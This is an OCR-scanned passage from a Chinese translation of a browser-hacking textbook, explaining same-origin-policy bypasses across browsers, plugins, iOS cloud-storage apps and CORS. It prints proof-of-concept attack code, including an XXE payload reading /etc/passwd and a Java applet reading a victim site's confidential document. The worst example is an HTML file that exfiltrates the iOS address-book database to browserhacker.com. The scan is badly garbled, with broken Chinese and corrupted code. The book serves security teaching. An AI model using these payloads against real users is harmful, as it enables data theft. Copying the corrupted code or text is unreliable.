这 样 的 jar URI 可 用 于 创建 URL 对 象 的 新 实例 。 因 为 SOP 此 时 不 起 作用 ， 所 以 加 载 自 
browserhacker.com 的 未 签名 的 Java 小 程序 ， 就 可 以 请 求 不 同 源 的 JAR 文 件 ， 实 际 上 也 可 以 读 取 其 
中 的 内 容 。 

通过 这 种 方式 绕 过 SOP ， 不 仅仅 可 以 访问 JAR 文 件 。JAR 文 件 本 质 上 是 包含 Manifest 和 
META-INF 文 件 夹 的 ZIP 文 件 。Microsoft Office 和 Open Office 文 档 格 式 也 一 样 ， 意 味 着 利用 这 种 绕 
行 技术 可 以 读 取 docx、odt、jar 力 至 其 他 任何 存档 文件 。 

以 下 代码 利用 这 种 绕 行 策略 ， 可 以 读 取 Open Office 文 档 的 内 容 : 


import java.awt.*; import java.applet.Applet ; 
import java.io.* ; import java.net.*; 
















































































public class zipSopBypass extends Applet { 


private TextArea ltArea - new TextArea("", 100, 300); 
public void init (){ 
add(l1tArea); 


} 


public void paint (Graphics g) { 


g.drawString("Reading file content in JAR...", 80, 80); 
// 这 个 小 程序 加 载 自 (RA) http://browserhacker.com origin 
String url = "Jjar:https://browservictim.com/"+ 


"stuff/confidential.odt!/content.xml"; 
String content = "" 
try{ 
URL u = new URL(url); 
BufferedReader ff = new BufferedReader ( 
new InputStreamReader (u.openStream()) 
); 
while (ff.ready() ) { 
content += ff.readLine(); 
j 
)catch(Exception e) { 
g.drawString( "Error",100,100); 
j 


ltArea.setText (content); 
g.drawString(content ,100,100); 











注意 ， 前 面 代码 中 的 url 变 量 指向 了 包含 在 odt 文 件 中 的 content.xml 资 源 。 在 Open Office 文 档 
中 ， 每 个 文件 都 包含 一 个 content.xml 资 源 。 

前 面 刚刚 谈 到 的 几乎 所 有 Java 绕 行 漏洞 都 被 Oracle 修 复 了 。 不 过 ， 根 据 安全 公司 WebSenses 
和 Bit9” 的 报告 ,大 量 企业 仍然 在 使 用 老 版 本 的 包含 漏洞 的 Java。2013 年 7 月 左右 ，Bit9 通 过 自己 的 
软件 声誉 服务 (software reputation service )， 统 计 了 大 约 400 个 组 织 的 Java 使 用 情况 。 总 体 来 看 ， 
大 约 有 100 万 个 企业 的 终端 系统 涵盖 在 这 次 调查 范围 之 内 。 其 中 ，80% 的 系统 使 用 Java 6。 在 这 些 
系统 中 ,仍然 可 以 不 经 用 户 介 入 而 运行 未 签名 的 小 程序 。 

最 新 的 浏览 器 和 Java 都 实现 了 点 击 播放 安全 机 制 。 你 可 能 会 认为 ， 这 个 安全 机 制 能 阻挡 你 在 
攻击 浏览 器 的 过 程 中 利用 Java 小 程序 。 事 实 上 ， 完 全 阻挡 还 做 不 到 ， 只 能 说 会 制造 一 些 麻 烦 。 别 
忘 了 ,IE9 及 更 低 版 本 还 没有 实现 点 击 播放 。 同 样 ， 根据 Bit9 的 调查 ,，93% 的 组 织 在 同一 台 机 器 上 
安装 了 不 同 版 本 的 Java。 换 句 话 说 ， 在 攻击 浏览 器 的 时 候 ， 利 用 Java 的 可 能 性 还 是 很 大 的 。 对 于 
安装 有 多 个 Java 版 本 的 系统 ， 可 以 攻击 旧版 本 以 及 不 支持 “ 单 击 运行 ”的 目标 浏览 器 。 

Java 插 件 的 广泛 存在 为 攻击 者 提供 了 大 量 机 会 。EricRomang 总 结 绘制 了 可 能 导致 任意 代码 执 
行 的 Java 零 日 时 间 线 ， 如 图 4-2 “所 示 。 虽 然 这 些 并 非 绕 过 SOP 的 技术 ， 但 通过 这 个 时 间 线 可 以 看 
到 将 来 的 可 能 性 。 
































图 4-2 ”2012 年 至 2013 年 年 中 的 Java 安 全 漏洞 时 间 线 














4.2.2 在 Adobe Reader 中 绕 过 SOP 


Adobe Reader 作 为 浏览 器 插件 被 爆 出 很 多 安全 漏洞 ， 因 此 声名 狼 头 。 由 于 溢出 和 “Use After 
Free" 缺陷 等 经 典 问题 , 导致 了 似乎 不 计 其 数 的 任意 代码 执行 机 会 。 有 关 直 接 攻击 Adobe Reader, 
我 们 将 在 8.3.5 节 再 讨论 ， 这 里 更 重要 的 是 理解 这 个 插件 中 的 缺陷 是 怎么 让 绕 过 SOP 成 为 可 能 的 。 

大 家 知道 , Adobe Reader PDF 解 析 器 理解 JavaScript”。 这 一 点 经 常会 被 恶意 软件 利用 , 在 PDF 
中 隐藏 恶意 代码 。 

CVE-2013-0622 就 是 让 绕 过 SOP 成 为 可 能 的 缺陷 之 一 ， 它 是 Billy Rios, Federico Lanusse 和 
Mauro Gentile 发 现 的 。 利 用 这 个 缺陷 (AdobeReader 11.0.0 以 上 版 本 已 经 修复 ), 可 以 像 前 面 讲 Java 
时 介绍 的 第 二 种 绕 过 SOP 的 方式 一 样 发 起 攻击 ,， 那 是 利用 开放 性 重 定向 ， 让 一 个 外 部 源 访问 重 定 
向 的 源 。 类 似 地 ， 在 这 里 如 果 请 求 返回 一 个 302 重 定向 响应 码 ， 就 可 以 达到 同样 的 目的 。 男 外 ， 
















































































这 个 漏洞 还 有 一 个 问题 ， 就 是 使 用 XXE 指 定 资源 时 ，SOP 也 不 会 起 作用 。 
常见 的 XXE 注 入 方式 是 把 恶意 代码 注入 接收 XML 输入 的 请 求 中 ， 比 如 : 
<!DOCTYPE foo [ 


<!ELEMENT foo ANY > 
<!ENTITY xxe SYSTEM "/etc/passwd" >]><foo>&xxe;</foo> 


如 果 XMIL 解析 器 允许 外 部 实体 出 现 ,那么 gxxe 就 会 被 /etc/passvwdq 的 内 容 取代 。 同 样 ， 可 
以 利用 这 一 点 绕 过 SOP， 即 〈 利用 外 部 实体 ) 加 载 资源 ， 服 务 器 以 302 重 定向 作为 响应 。 真 正 想 
要 加 载 的 资源 在 重 定向 的 目标 中 。 看 看 下 面 的 JavaScript 代 码 片段 ， 它 包含 在 一 个 PDF 文件 中 : 


Var xml="<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> 
<!DOCTYPE foo [ <!ELEMENT foo ANY» <! ENTITY xxe 

SYSTEM \"http://browserhacker.com?redirect= 
http%3A%2F%2Fbrowservictim.com$2Fdocument .txt\">]> 
<foo>&xxe;</foo>"; 

var xdoc = XMLData.parse(xml, false); 
app.alert (escape (xdoc.foo.value) ); 


加 载 PDF 时 ， 就 会 执行 前 面 的 JavaScript 代 码 。 此 时 有 一 个 GET 请 求 被 发 送 到 browserhacker. 
com， 该 域 返 回 302 响 应 ， 将 请 求 的 目标 设置 为 redirect 参 数 的 值 。 然 后 ，document.txt (来 自 
browservictim.com ) 中 的 内 容 会 被 获取 并 解析 。 

源 http://browserhacker.com 应 该 不 能 访问 源 http://browservictim.com 中 的 内 容 。 这 显然 是 Adobe 
Reader SOP 实 现 中 的 一 个 安全 缺陷 ， 因 为 PDF 中 的 代码 应 该 只 能 访问 与 PDF 同 源 的 内 容 。 而 在 这 
里 ， 我 们 却 取得 了 PDF 源 之 外 的 内 容 。 利 用 这 个 漏洞 有 一 个 限制 ， 适 用 于 一 般 的 XXE 注 入 缺陷 。 
那 就 是 要 取得 的 资源 要 么 是 纯 文本 ,要么 是 XML 文 档 ， 否 则 XML 解 析 器 会 抛 出 错误 。 






























































4.2.3 在 Adobe Flash 中 绕 过 SOP 


AdobeFlash 中 有 crossdomain.xml 文 件 机 制 。 与 其 他 应 用 一 样 , 这 个 文件 控制 Flash 可 以 从 哪些 
站 点 取得 数据 。 虽 然 这 个 文件 只 应 包含 受信 任 的 站 点 ,但 一 些 宽 泛 的 crossdomain.xml 文 件 也 经 常 
出 现 。 下 面 是 一 个 例子 : 


<?xml version="1.0"?> 
<cross-domain-policy> 
<site-control permitted-cross-domain-policies="by-content-type"/> 
«allow-access-from domain="*" /> 
</cross-domain-policy> 


这 样 设置 allow-access-from domain， 加 载 自任 意 源 的 Flash 对 象 ， 就 都 可 以 向 认可 该 宽 
泛 策略 的 域 发 送 请 求 并 读 取 响 应 了 。 

这 里 的 域 应 该 设置 为 有 限 个 ， 而 且 只 应 包含 受信 任 的 主机 。 因 为 跨 过 这 道门 槛 ， 所 有 勾 连 
浏览 器 都 可 以 与 使 用 Flash 的 受 影响 的 应 用 进行 双向 通信 。 有 关 此 类 攻击 的 详细 信息 ， 将 在 第 9 


章 介绍 。 
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4.2.4 在 Silverlight 中 绕 过 SOP 





Microsoft 的 Silverlight 插 件 与 Flash 采 取 相 同 的 SOP 策 略 。 为 了 实现 跨 域 通信 , 站 点 需要 发 布 





个 名 为 clientaccess-policy.xml 的 文件 ， 包 含 以 下 内 容 : 


<?xml version="1.0" encoding="utf-8"?> 
<access-policy> 
<cross-domain-access> 
<policy> 
<allow-from> 
<domain uri="*"/> 
</allow-from> 
«grant-to» 
«resource path="/" include-subpaths="true"/> 
</grant-to> 
</policy> 
</cross-domain-access> 
</access-policy> 








需要 注意 ，Flash 与 Silverlight 在 跨 域 通信 的 实现 上 还 是 有 区 别 的 。Silverlight 不 会 基于 

















端口 来 隔离 不 同 源 之 间 的 通信 ， 这 一 点 与 Flash 和 CORS 不 同 。 因 此 ，Silverlight 
http://browserhacker.com ilhttps://browserhacker.com: APRN P. 





























F 协 议和 


这 就 埋 下 了 很 大 的 隐患 ， 因 为 它 在 HTTP 和 HTTPS 之 间 搭 起 了 一 座 桥 粱 。 如 果 你 可 以 通过 





HTTP 输 入 恶意 内 容 ， 那 就 有 可 能 通过 HTTPS 获 取 ( 敏感 的 ) 内 容 。 


4.2.5 在 IE 中 绕 过 SOP 


在 正中 绕 过 SOP 的 方案 也 不 止 一 种 。 比 如 ， 在 Internet Explorer 8 Beta 2 ( 包括 IE6 和 IE7 ) 中 ， 


XIdocument .domain 的 实现 都 存在 绕 过 SOP 的 漏洞 ”。 利 用 其 中 的 缺陷 很 简单 Gareth 
示 过 5， 就 是 简单 地 覆盖 aocument 对 象 和 daomain 属 性 。 
下 面 的 代码 展示 了 这 个 隐患 : 
var document; 
document = {}; 


document.domain = 'browserhacker.com'; 
alert (document .domain) ; 








pate 





Heyes 演 


如 果 是 在 最 新 的 浏览 器 中 运行 以 上 代码 ， 可 以 在 JavaScript 控 制 台 中 看 到 违反 SOP 限 制 的 错 





IRo 但是， 在 旧版 本 的 正中 就 不 会 有 问题 。 通 过 在 XSS 中 利用 以 上 代码 ， 就 可 以 绕 过 SO 
他 源 进行 双向 通信 。 

















4.2.6 在 Safari 中 绕 过 SOP 
对 SOP 而 言 ， 不 同 的 协议 就 是 不 同 源 。 因 此 ，http://localhost 与 他 e://localhost 不 同 源 。 



































P, 与 其 


有 人 因 


此 会 推断 ，SOP 对 不 同 的 协议 会 一 视 同 仁 。 但 正如 本 节 要 讲 的 , 对 file 协 议 来 说 , 还 是 有 一 些 值得 





注意 的 例外 ， 因 为 访问 本 地 文件 通常 需要 更 高 的 权限 。 
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Safari 浏 览 器 从 2007 年 "开始 到 现在 〈 写作 本 书 时 ) 的 6.0.2 版 本 ， 都 没有 对 访问 本 地 资源 执 
行 SOP。 如 果 你 想 在 Safari 中 执行 JavaScript， 可 以 试 试 欺骗 用 户 下 载 并 打开 本 地 文件 。 有 了 这 个 
漏洞 ， 再 配合 社会 工程 邮件 中 包含 恶意 代码 的 HTML 附 件 ， 就 足够 了 。 当 用 户 通 过 file 协 议 打开 
HTML 附 件 时 ， 其 中 的 JavaScript 代 码 就 可 以 绕 过 SOP， 并 与 不 同 的 源 进 行 双向 通信 。 来 看 一 看 
下 面 的 页 面 : 


<html> 

<body> 

«hi1» I'm a local file loaded using the file:// scheme </h1> 
<script> 


xhr = new XMLHttpRequest (); 

xhr.onreadystatechange = function ()( 
if (xhr.readyState == 4) { 
alert(xhr.responseText); 
j 

js 

xhr.open("GET", 

"http://browserhacker.com/pocs/safari sop bypass/different orig.html"); 

xhr.send(); 

</script> 

</body> 

</html> 


当 页 面 通过 人 好 e 协 议 加 载 后 ，XMLHttpReduest 对 象 在 请 求 browserhackercom 中 的 different - 
orig.html 后 可 以 读 取 响 应 。 在 图 4-3 中 , 可 以 看 到 这 样 做 的 结果 , 读 取 的 内 容 被 显示 在 了 警告 对 话 
框 中 。 


local_file.html 








JavaScript 


<html> 
<body> 
«h1» I'm on a different origin «/h1» 
</body> 
</html> 


Ek 





图 4-3 ”使 用 file 协 议 加 载 JavaScript 代 码 后 ， 会 成 功 获得 跨 域 资源 的 内 容 
相反 ， 如 果 你 使 用 其 他 协议 ( 比如 http ) 加 载 这 个 页 面 ， 会 发 现 警 告 对 话 框 是 空 的 。 
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4.2.7 # Firefox 中 绕 过 SOP 


2012 年 10 月 ，Gareth Heyes 发 现 了 一 个 在 Firefox 中 绕 过 SOP 的 绝妙 方法 "。 因 为 漏洞 实在 太 严 
重 ,， 所 以 Mozilla 决 定 在 修复 漏洞 之 前 ,不 让 用 户 从 他 们 的 服务 器 上 下 载 Firefox 16*。 考 虑 到 之 前 
的 版 本 并 未 受到 攻击 ，Mozilla 假 设 该 漏洞 是 由 该 版 本 升级 引入 ， 并 且 没 有 在 对 Firefox 16 进 行 回 
归 测 试 时 发 现 。 这 个 漏洞 会 导致 在 SOP 的 限制 之 外 ， 未 经 授权 访问 window .1location 对 象 。 以 
下 是 Heyes 最 初 的 概念 验证 (Proof of Concept ，PoC ) 代码 : 














<!doctype html> 


«script» 
function poc() ( 
var win - window.open('https://twitter.com/lists/', 'newWin', 


'width-200,height-200'); 
setTimeout(function()( 
alert('Hello '+/*https:\/\/twitter.com\/([*/]+)/.exec ( 
win. location) [1]) 

}, 5000); 

} 
</script> 
<input type=button value="Firefox knows" onclick="poc()"> 


在 你 控制 的 源 ( 比如 browserhackercom ) 中 执行 前 面 的 代码 ， 而 且 有 一 个 标签 页 登录 了 
Twitter， 就 可 以 发 动 这 种 攻击 。 执 行 后 会 打开 一 个 新 窗口 ， 加 载 https://twitter.com/lists。 Twitter 
随后 自动 重 定向 到 https://twitter.com/<user id»/lists ( 其 中 user id 是 你 的 Twitter 句柄 )。5 秒 钟 后 ， 
exec 了 国 数 会 触发 正则 表达 式 对 windqow.1location 对 象 进行 解析 (漏洞 就 在 这 里 ， 因 为 不 应 该 能 
跨 域 访问 )。 于 是 Twitter 的 句柄 就 会 显示 在 警告 框 里 面 。 


沙 箱 中 的 IFrame 

HTML5 给 IFrame 元 素 添 加 了 一 个 新 属性 : sandqbox。 这 个 新 属性 是 为 了 更 细 粒 度 也 更 安 
全 地 使 用 IFrame， 同 时 限制 来 自 不 同 源 的 第 三 方 内 容 的 潜在 侵害 。 

这 个 sandbox 属 性 值 可 以 是 零 或 多 个 下 列 关 键 字 : allow-forms、allow-popups、 


allow-same-origin, allow-scripts#rallow-top-navigation. 












































20124E8 H AA, Firefox F I 3c S$HTMLSBJTPAG ARAE Braun ZH, YE sandbox W 
allow-scriptsIt, WERHEZ p B JavaScript hln LAs lal window.top. iF MA Y ux 
变 外 部 wingdow 地 址 的 可 能 : 


<!-- 外 部 文件 ， 带 有 沙 箱 --> 
«iframe src-"inner.html" sandbox="allow-scripts"></iframe> 


框架 内 的 代码 是 : 


<!-- Framed document , inner.html --> 

<script > 

// Xhi: 

if(top != window) { top.location = window.location; } 
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// 下 面 的 JavaScript 代 码 和 标记 都 不 受 限 制 : 
// 允许 插件 、 弹 出 窗口 和 表单 。 


</script> 

这 样 , 即使 不 指定 关键 字 allowtop-navigation, WEHE PIIRA JavaScript tig n f 
修改 外 部 window 的 地 址 。 攻 击 者 可 以 利用 这 一 点 ， 把 用 户 限 制 在 恶意 网 站 中 ， 达 到 勾 住 受害 汉 
览 需 的 目的 。 











= oe 


4.2.8 在 Opera 中 绕 过 SOP 


看 一 看 Opera 稳 定 版 12.10 的 修改 日 志 ”, 会 发 现 各 种 修复 的 安全 漏洞 。 在 这 些 补 丁 里 ”， 有 一 
个 针对 的 就 是 Heyes 发 现 的 绕 过 SOP 的 方法 2 。 这 个 漏洞 的 关键 是 Opera 在 重 写 原型 的 时 候 不 会 强 
制 贯 彻 SOP， 所 谓 重 写 原型 指 的 是 重 写 IFrame 位 置 对 象 的 构造 函数 。 看 看 下 面 的 代码 : 


<html> 

<body> 

«iframe id-"ifr" src-"http://browservictim.com/xdomain.html"»«/iframe- 

<script> 

var iframe = document.getElementById('ifr'); 

function do_something() { 

var iframe = document.getElementById('ifr'); 
iframe.contentWindow.location.constructor. 
prototype.  defineGetter  .constructor('[].constructor. 
prototype.join-function()(console.log("pwned"))') 0; 

} 

setTimeout ("do something()",3000); 

«/script» 

</body> 

</html> 


以 下 是 从 另 一 个 源 框 进来 的 内 容 : 


<html> 
<body> 
<b>I will be framed from a different origin</b> 
<script> 
function do_join() { 

[1,2,3].j0int)z 

console.log("join() after prototype override: " 
+ [].constructor.prototype.join); 
} 


console.log("join() after prototype override: " 






























































+ [].constructor.prototype.join); 
setTimeout ("do join();", 5000); 
</script> 
</body> 
</html> 


这 些 代码 要 把 [] .constructor .prototype.join 的 值 输出 到 控制 台 ， 也 就 是 输出 在 数组 
上 调用 的 join 0 的 原生 代码 。5 秒 钟 后 ， 数 组 [1,2,3] ee ) 方 法 ， 并 再 次 调用 之 前 用 过 
的 打印 函数 。 第 二 次 调用 结果 会 发 生变 化 ， 此 时 join () 已 经 被 重 写 了 。 看 看 前 面 第 一 段 代 码 ， 
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可 以 看 到 ao_something () 函数 在 哪里 通过 原型 重 写 了 join () 。 下 面 再 好 好 看 一 看 这 几 行 代码 


iframe.contentWindow.location.constructor. 
prototype.  defineGetter  .constructor('[].constructor. 
prototype. join=function() {console.log("pwned") }') O; 


注意 ， 你 可 以 调用 ;iframe.contentWindow.location.constructor， 而 不 会 触发 任何 
违反 SOP 的 错误 。 这 是 有 问题 的 ， 因 为 此 时 应 该 贯彻 SOP。 例如，Chrome 此 时 就 会 抛 出 一 个 违反 
SOP 的 错误 ， 如 图 4-4 所 示 。 





iframe. contentWindow. location. constructor 


> Unsafe JavaScript attempt to access frame with URL 
http: //differentorigin.com/xdomain.html from frame with URL 
http://localhost/pocs/opera sop bypass/opera sop bypass.html. Domains, 








protocols and ports must match. 
undef ined 





图 4-4 ”学 试 访问 构造 函数 时 ， 触 发 了 Chrome 的 违反 SOP 错 误 



































进一步， 你 应 该 再 检查 一 下 在 重 写 原 型 之 后 是 否 可 以 实际 地 执行 代码 。 在 图 4-5 中 ， 可 以 
看 到 能 够 执行 代码 ， 比 如 return 5+20， 但 可 执行 的 范围 有 限 。 甚 至 不 能 使 用 alert () 函数 ， 
还 会 产生 安全 错误 。 














>>> iframe. contentWindow. location. 
— Location 
— Function 
apply Function 
bind Function 
call Function 
constructor Function 
length 
name 
+ toString Function 
+ Object 


t 
t 
t 
t 


>>> iframe. contentWindow. location. 


( om 


or.prototype. 
25 
>>> iframe. contentWindow. location. 

f [ ( or 


+ Unhandled Error: Security error: attempted to read protected 
variable: alert 


图 4-5 ”尝试 执行 受 限行 为 时 ， 会 发 生 安全 错误 


Heyes 还 发 现 了 男 一 个 绕 过 SOP 的 方法 ， 就 是 使 用 字面 值 来 重 写 原 型 ，Opera 同 样 不 会 过 滤 这 
种 情况 。 就 拿 数 组 字面 值 [] 来 说 ， 通 过 以 下 指令 对 join() 方 法 进行 原型 重 写 ， 就 可 以 在 框架 内 
通过 任意 数组 调用 join () 方 法 ， 以 执行 任意 代码 : 

[].constructor.prototype.join-function() (your code); 

要 进一步 了 解 这 个 绕 过 SOP 的 技术 ， 可 以 从 https://browserhacker.com 下 载 代 码 。 然 后 把 这 
两 段 代码 分 别 托管 到 两 个 不 同 的 源 ， 并 打开 Opera 12.02 控 制 台 。 控 制 台 中 的 输入 应 该 与 图 4-6 
一 样 。 


"prototype. 
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& 
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€ > p] Oe | @ web | lecalhost/pocs/opera sop bypass/opera sop bypass.html 





I will be framed from a different origin 


Beo 


E. Documents H Scripts E Network > Resources Er Storage (2 Profiler 





[ http:/ [localhost /pocs/opera, sop. bypass [opera sop. bypass.html 





join() after prototype override: function join() ( [native code] ) 
pwned 
join() after prototype override: function(){console.1log("pwned")} 
>>> | 








图 4-6  fEOpera' R33 join O 函数 


使 用 这 个 绕 过 方案 有 个 前 提 ， 就 是 只 能 以 可 以 内 能 框架 的 网 站 作为 目标 。 因 此 ， 使 用 了 
X-Frame-Options 或 框架 爆破 〈frame-busting ) 代码 的 源 不 在 此 列 。 还 有 一 点 ， 不 仅 可 以 使 用 字面 
值 重 写 Array .join()， 而 且 可 以 重 写 任何 原型 。 例 如 ， 可 以 像 下 面 这 样 重 写 tostring (): 

"".constructor.prototype.tostring=function() {alert (1)} 

在 实际 攻击 中 ， 可 能 需要 框 住 一 个 资源 ， 可 能 是 会 话 cookie 已 经 保存 在 浏览 器 中 的 认证 过 的 
页 面 ， 然 后 使 用 这 个 绕 过 SOP 技 术 读 取 框 中 资源 的 内 容 。 框 中 资源 大 多 包含 用 户 的 隐私 数据 ， 
为 在 加 载 这 些 资源 时 会 验证 会 话 cookie。 

假设 Opera 中 有 两 个 打开 的 标签 页 : 一 个 是 被 勾 连 的 (被 你 控制 的 ) 标签 页 ， 另 一 个 是 认证 
过 的 目标 源 。 如 果 你 创建 一 个 IFrame ( 在 被 勾 连 的 标签 页 中 )， 将 认证 过 的 源 作为 src 值 ,那么 就 
可 以 读 取 IFrame 的 内 容 。 这 就 意味 着 你 可 以 获取 位 于 认证 过 的 目标 源 中 的 任何 敏感 信息 。 

这 种 攻击 的 结果 就 是 读 取 跨 域 资源 的 内 容 ， 并 有 效 地 绕 过 SOP。 
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实施 SOP 过 程 中 ， 出 现 问 题 的 环节 不 限于 浏览 器 及 其 插件 。2012 年 ,一 些 云 存储 服务 也 被 发 
现 了 绕 过 SOP 的 漏洞 。 这 其 中 包括 iOS 中 的 Dropbox 1.4.6 和 安 卓 中 的 2.0.1 版 2 , 以 及 iOS 中 的 Google 
Drive 1.0.1 版 ”。 这 些 服务 可 以 把 本 地 文件 存储 并 同步 到 云 中 ， 目 的 是 安装 了 Dropbox 或 Google 
Drive 客 户 端的 设备 可 以 随处 访问 这 些 文件 。 

Roi Saltzman 发 现 了 一 个 类 似 于 前 面 介绍 的 绕 过 Safari SOP 的 方法 。 这 个 漏洞 同时 影响 到 
Dropbox 和 Google Drive。 攻 击 有 赖 于 从 一 个 私密 区 加 载 一 个 文件 ， 比 如 : 


file:///var/mobile/Applications/APP_UUID 


如 果 你 能 欺骗 目标 通过 客户 端 应 用 加 载 一 个 HTML 文 件 , 那么 该 文件 中 包含 的 JavaScript 代 码 
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就 会 被 执行 。 关 键 在 于 ， 这 个 从 私密 区 加 载 的 文件 允许 JavaScript 访 问 移动 设备 的 本 地 文件 系统 。 
这 说 明 对 贯彻 SOP 的 设计 是 有 缺陷 的 。 因 为 加 载 恶 意 HTML 文 件 使 用 的 是 file 协 议 , 所 以 无 法 阻止 
JavaScript 访 问 其 他 文件 ， 比 如 : 

file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb 

这 个 SQLite 数 据 库 包含 着 用 户 iOS 中 的 地 址 短 。 当 然 ， 这 个 文件 必须 通过 该 应 用 才能 访问 。 
如 果 目 标 应 用 拒绝 应 用 范围 外 的 文件 访问 , 那 你 还 可 以 取得 缓存 的 文件 。 通过 这 种 漏洞 达成 的 访 
问 ， 很 大 程度 上 取决 于 存在 漏洞 的 应 用 。 

如 果 你 欺骗 目标 使 用 有 漏洞 的 Dropbox 或 Google Drive 客 户 端 打 开 下 面 的 恶意 文件 , 那么 用 户 
地 址 短 的 内 容 就 会 被 发 送 到 browserhacker.com : 






































<html> 
<body> 
<script> 
local xhr = new XMLHttpRequest (); 
local_xhr.open("GET", "file:///var/mobile/Library/AddressBook/ 


AddressBook.sqlitedb") ; 
local xhr.send(); 


local xhr.onreadystatechange = function () { 
if (local xhr.readyState -- 4) ( 
remote xhr - new XMLHttpRequest(); 
remote xhr.onreadystatechange = function () {}; 
remote xhr.open("GET", "http://browserhacker.com/?f=" + 


encodeURI (local xhr.responseText)); 
remote xhr.send(); 
} 
} 
</script> 
</body> 
</html> 


这 个 攻击 案例 展示 了 利用 巧妙 编写 的 JavaScript 来 利用 漏洞 的 不 同方 式 。JavaScript 经 常会 出 
现在 不 同 的 环境 或 上 下 文 里 ， 不 光 是 浏览 器 。 在 上 面 这 个 iOS 攻 击 中 ， 利 用 过 程 就 是 在 Dropbox 
或 Google 应 用 的 UIWebView 对 象 中 实现 的 。 很 多 原生 iOS 应 用 都 会 通 入 UIWebView 对 象 ， 以 实现 
某 种 浏览 器 功能 。 

男 一 个 要 注意 的 是 ， 这 个 攻击 的 目标 是 移动 操作 系统 ， 不 是 传统 的 桌面 环境 。 由 于 可 见 UI 
的 大 小 所 限 ， 这 些 任务 通常 会 在 目标 上 毫 无 察觉 的 情况 下 完成 。 





















































4.2.10 在 CORS 中 绕 过 SOP 

虽然 CORS 是 放松 SOP 管 制 的 一 种 好 办 法 ， 但 如 果 对 放松 管理 的 策略 缺乏 理解 ， 那 很 容易 出 
现 配 置 错 误 。 比 如 ， 下 面 就 是 一 种 可 能 的 错误 配置 : 

Access-Control-Allow-Origin: * 


2012 年 11 月 ，Veracode 研 究 了 Alexa 前 100 万 个 站 点 的 HTTP 首 部 ”。 结 果 发 现 ，2000 多 个 源 的 
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Access-Control-Allow-Origin 首 部 返回 的 都 是 这 种 通配符 值 。 这 就 意味 着 允许 互联 网 上 的 任何 站 点 
向 这 些 站 点 提交 器 域 请 求 并 读 取 响应 。 实 践 中 ， 这 意味 着 攻击 者 可 以 绕 过 这 些 域 的 SOP。 视 Web 
应 用 的 功能 不 同 ,， 这样 配置 有 可 能 会 带 来 灾难 性 后 果 。 这 是 因为 没有 了 SOP， 攻击 者 利用 被 害 浏 
览 句 ， 对 这 些 站 点 无 论 是 爬 取 内 容 还 是 发 动 攻击 ， 都 会 更 加 便利 。 

显然 ， 在 很 多 情况 下 ， 使 用 通配符 的 Access-Control-Allow-Origin 首 部 也 不 会 不 安全 。 比 如 ， 
一 个 站 点 只 用 于 提供 不 敏感 的 信息 。 

在 分 析 设 置 了 CORS 首 部 的 应 用 时 ， 有 一 点 非常 重要 ， 就 是 要 理解 被 允许 的 源 之 间 的 关系 。 
在 没有 使 用 通配符 值 的 情况 下 ,理解 这 些 关 系 就 更 加 重要 了 。 同 一 目标 可 能 允许 多 个 源 访 问 。 
此 ， 这 些 源 中 的 标准 XSS 漏 洞 可 能 就 足以 让 你 跨 域 利用 目标 的 功能 

我 们 这 里 给 出 的 绕 过 SOP 的 例子 ， 都 以 展示 概念 和 思路 为 主 ， 可 能 并 不 全 面 。 其 实 还 有 很 多 
可 以 讲 , 肯定 也 还 会 有 很 多 不 断 被 挖掘 出 来 。 希望 读者 能 够 搞 清楚 这 些 变 体 之 间 的 关系 ， 找 到 其 
中 共性 的 东西 加 以 利用 。 依赖 301 或 302 重 定向 , 以 及 file 等 协议 的 绕 过 SOP 的 方法 , 肯定 会 在 将 来 
针对 新 SOP 漏 洞 的 攻击 中 继续 发 挥 作 用 。 


4.3 FAR SOP 技术 


理解 了 SOP 和 绕 过 SOP 的 技术 之 后 ， 接 下 来 该 看 看 如 何在 实践 中 加 以 利用 了 。 

本 节 将 告诉 大 家 怎么 利用 前 面 一 节 介 绍 的 绕 过 SOP 的 方案 , 把 勾 连 浏览 器 作为 自己 的 HTTP 代 
理 。 甚 至 ， 在 防御 型 cookie 标 志和 预防 并 发 会 话 等 Web 应 用 安全 机 制 启用 的 情况 下 ， 都 可 以 成 功 。 

这 一 节 还 将 介绍 几 个 界面 伪装 攻击 , 其 中 一 些 需 要 绕 过 SOP , 另 一 些 则 直接 起 作用 , 因为 SOP 
最 初 并 不 是 为 了 应 对 这 些 问 题 而 设计 的 。 


4.3.1 代理 请 求 


控制 某 个 源 之 后 ， 就 可 以 实施 后 续 攻 击 了 。 利 用 被 匀 连 的 浏览 器 替 你 发 送 请 求 ,可 以 实现 代 
理 请 求 ， 通 过 被 勾 连 的 浏览 器 访问 其 他 源 。 这 样 ， 可 以 利用 被 勾 连 浏览 器 的 用 户 cookie( 认证 
token )， 从 而 获得 更 多 访问 权限 。 当 然 ， 就 算 不 考虑 绕 过 SOP ， 代 理 请 求 也 是 很 有 用 的 。 

Anton Rager 率 先 发 表 了 一 篇 公开 论文 ， 主 题 是 利用 XSS 隐 上 患 创 建 HTTP 代 理 ”。Petko Petkov 
在 Rager 人 研究 的 基础 上 开发 了 BackFrame。 Stefano di Paola 和 Girorgio Fedon 进 一 步 扩展 了 这 个 人 研究 ， 
并 在 2006 年 发 表 论文 “Subverting AJAX””。 这 两 位 研究 者 展示 了 利用 原型 重 写 、HTTP 响 应 拆 
分 及 其 他 技术 ， 来 破坏 AJAX 的 多 种 途径 。 

2007 年 , Ferruh Mavituna 发 布 的 XSS Tunnel”, 也 是 一 个 利用 勾 连 浏览 器 做 HTTP 代 理 的 例子 。 
后 来 ，BeEF 实 现 了 这 个 概念 ， 那 就 是 Tunneling Proxy。 此 后 ，BeEF 的 Tunneling Proxy 儿 经 扩展 ， 
又 支持 了 其 他 绕 过 SOP 的 策略 。 通 过 XSS 代 理 请 求 的 基本 原理 是 这 样 的 。 

(1) 一 台 服 务 器 通过 套 接 字 监 听 攻 击 者 的 机 器 (代理 后 端 )。 它 解析 收 到 的 HTTP 请 求 ， 并 将 
其 转换 成 AJAX 请 求 ， 随 时 准备 将 该 请 求 插 人 被 匀 连 浏览 需要 执行 的 后 续 JavaScript 代 码 中 。 

(2) 这 些 JavaScript 代 码 随 后 通过 第 3 章 讨 论 过 的 某 种 通信 渠道 ， 被 发 送 给 被 匀 连 的 浏览 
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(3) 被 勾 连 的 浏览 器 执行 这 些 代码 时 ， 就 会 发 送 相 应 的 AJAX 请 求 ， 而 HTTP 响 应 则 被 发 送 回 
代理 后 端 。 

